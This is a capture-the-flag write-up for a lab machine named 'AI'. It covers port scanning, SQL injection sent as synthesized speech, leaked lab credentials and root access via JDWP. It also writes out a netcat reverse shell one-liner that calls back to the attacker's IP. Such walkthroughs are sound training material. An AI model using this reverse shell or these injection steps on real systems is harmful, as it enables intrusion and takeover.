We start box with the usual nmap -sC -sV -Pn -p- -oA ./AI 10.10.10.163
It appears that we have only SSH and HTTP running on their usual ports. Let's check the HTTP page and fire up gobuster while we look around manually.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.163/ -x php
To make matters more confusing, when you hover over that AI icon and select AI, you're asked to process a WAV file to make a query. Unless it's trying to use voice recog or some kind of stego, that's a new one on me.
Now we have some places to check. Checking out "intelligence.php" gives us a VERY useful table.
Amazingly, I was not too far off with the voice recognition comment. The page mentions that it is using the Male-US voice model with Microsoft, so after digging around MS's site for about an hour, I finally find this article. I just need to figure out how to get my text into a wav format. Well funny enough, there is a text2wave component of the festival package. Let's play around with it.
$ sudo apt-get install festival -y
$ echo "Is this thing on question mark" | text2wave -o test.wav
If you play the wave file, it says EXACTLY what is echo'ed. So it actually says question mark. I wonder how that's going to play with the query punctuation, but I suspect that's where the "AI" portion comes in. Let's try it out on the users tables with both username and password.
$ echo "open single, quote, join, select, username from users, pound sign" | text2wave -o username.wav
$ echo "open single, quote, join, select, password from users, pound sign" | text2wave -o password.wav
and then upload those wav files to the AI page. Below are screenshots of the results.
Well hello there alexa! It looks like we have some creds. alexa:H,Sq9t6}a<)?q93_ which will let us SSH into the box. Time to run LinEnum.sh and find our way to PrivEsc. As always, the LinEnum output is in the CTB file. Around line 743 (trust me, this crap gets boring to read, but has the possibility of saving you DAYS of work trying to find it manually without the script), we find a nice section of Java Debug Wire Protocal information.
root 24722 18.5 5.5 3137572 110584 ? Sl 17:24 0:04 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
That's straight from the CTB. So, JDWP is running on localhost:8000. I'm not great at Java debugging, but I know someone who is (Thanks again Raiden99!). The Java Debugger is hugely disappointing, especially since none of the alternative to Oracle Jave have it, and we can't connect to port 8000 and can't install it on the Target. A quick Google search brings us to https://github.com/IOActive/jdwp-shellifier and with this we should be able to get a root shell. So, create your usual nc reverse shell script:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f
and move it and the shellifier.py script to the TARGET box. Set up 2 nc listeners. One on your machine, and the other to 8005 on the Target. Then, execute the shellifier. Boom goes the dynamite and you're a rooted box.
That's all, folks!